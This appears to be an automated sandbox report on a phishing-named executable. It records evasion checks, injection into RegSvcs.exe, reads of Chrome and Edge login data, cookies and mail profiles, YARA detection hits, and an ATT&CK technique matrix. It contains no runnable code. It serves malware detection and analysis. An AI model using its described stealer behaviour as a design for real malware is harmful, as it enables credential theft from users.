                      Source: C:\Users\user\Desktop\New Order PO#86637.exeAPI call chain: ExitProcess graph end nodegraph_0-86638
                      Source: C:\Users\user\AppData\Local\directory\name.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06549548 LdrInitializeThunk,3_2_06549548
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0420C528 mov eax, dword ptr fs:[00000030h]0_2_0420C528
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0420C588 mov eax, dword ptr fs:[00000030h]0_2_0420C588
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0420AEF8 mov eax, dword ptr fs:[00000030h]0_2_0420AEF8
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_04218508 mov eax, dword ptr fs:[00000030h]2_2_04218508
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_04218568 mov eax, dword ptr fs:[00000030h]2_2_04218568
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_04216ED8 mov eax, dword ptr fs:[00000030h]2_2_04216ED8
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_04648530 mov eax, dword ptr fs:[00000030h]5_2_04648530
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_04648590 mov eax, dword ptr fs:[00000030h]5_2_04648590
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_04646F00 mov eax, dword ptr fs:[00000030h]5_2_04646F00
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0041F250 SetUnhandledExceptionFilter,5_2_0041F250
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0041A208
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00417DAA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B33008Jump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 4B6008Jump to behavior
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
                      Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\New Order PO#86637.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
                      Source: New Order PO#86637.exe, name.exeBinary or memory string: Shell_TrayWnd
                      Source: New Order PO#86637.exe, name.exe.0.drBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,0_2_0041E364
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 00000003.00000002.4537810663.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5.2.name.exe.3f40000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.name.exe.3740000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.name.exe.3740000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.name.exe.3f40000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.4535184676.0000000000374000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: name.exe PID: 4592, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1488, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: name.exe PID: 1292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5688, type: MEMORYSTR
                      Source: Yara matchFile source: 5.2.name.exe.3f40000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.name.exe.3740000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.name.exe.3740000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.name.exe.3f40000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.4535184676.0000000000374000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: name.exe PID: 4592, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: name.exe PID: 1292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5688, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: name.exeBinary or memory string: WIN_XP
                      Source: name.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
                      Source: name.exeBinary or memory string: WIN_XPe
                      Source: name.exeBinary or memory string: WIN_VISTA
                      Source: name.exeBinary or memory string: WIN_7
                      Source: name.exeBinary or memory string: WIN_8
                      Source: Yara matchFile source: 5.2.name.exe.3f40000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.name.exe.3740000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.name.exe.3740000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.name.exe.3f40000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.4535184676.0000000000374000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: name.exe PID: 4592, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1488, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: name.exe PID: 1292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5688, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 00000003.00000002.4537810663.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5.2.name.exe.3f40000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.name.exe.3740000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.name.exe.3740000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.name.exe.3f40000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.4535184676.0000000000374000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: name.exe PID: 4592, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1488, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: name.exe PID: 1292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5688, type: MEMORYSTR
                      Source: Yara matchFile source: 5.2.name.exe.3f40000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.name.exe.3740000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.name.exe.3740000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.name.exe.3f40000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.4535184676.0000000000374000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: name.exe PID: 4592, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: name.exe PID: 1292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5688, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,5_2_004652BE
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_00476619
                      Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,5_2_0046CEF3
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information111
                      Scripting
                      2
                      Valid Accounts
                      2
                      Native API
                      111
                      Scripting
                      1
                      Exploitation for Privilege Escalation
                      11
                      Disable or Modify Tools
                      1
                      OS Credential Dumping
                      2
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Web Service
                      Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      11
                      Deobfuscate/Decode Files or Information
                      21
                      Input Capture
                      1
                      Account Discovery
                      Remote Desktop Protocol1
                      Data from Local System
                      4
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt2
                      Valid Accounts
                      2
                      Valid Accounts
                      31
                      Obfuscated Files or Information
                      Security Account Manager3
                      File and Directory Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      11
                      Encrypted Channel
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron2
                      Registry Run Keys / Startup Folder
                      21
                      Access Token Manipulation
                      1
                      DLL Side-Loading
                      NTDS117
                      System Information Discovery
                      Distributed Component Object Model21
                      Input Capture
                      1
                      Non-Standard Port
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                      Process Injection
                      11
                      Masquerading
                      LSA Secrets221
                      Security Software Discovery
                      SSH3
                      Clipboard Data
                      4
                      Non-Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                      Registry Run Keys / Startup Folder
                      2
                      Valid Accounts
                      Cached Domain Credentials11
                      Virtualization/Sandbox Evasion
                      VNCGUI Input Capture25
                      Application Layer Protocol
                      Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                      Virtualization/Sandbox Evasion
                      DCSync2
                      Process Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                      Access Token Manipulation
                      Proc Filesystem11
                      Application Window Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                      Process Injection
                      /etc/passwd and /etc/shadow1
                      System Owner/User Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                      System Network Configuration Discovery
                      Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
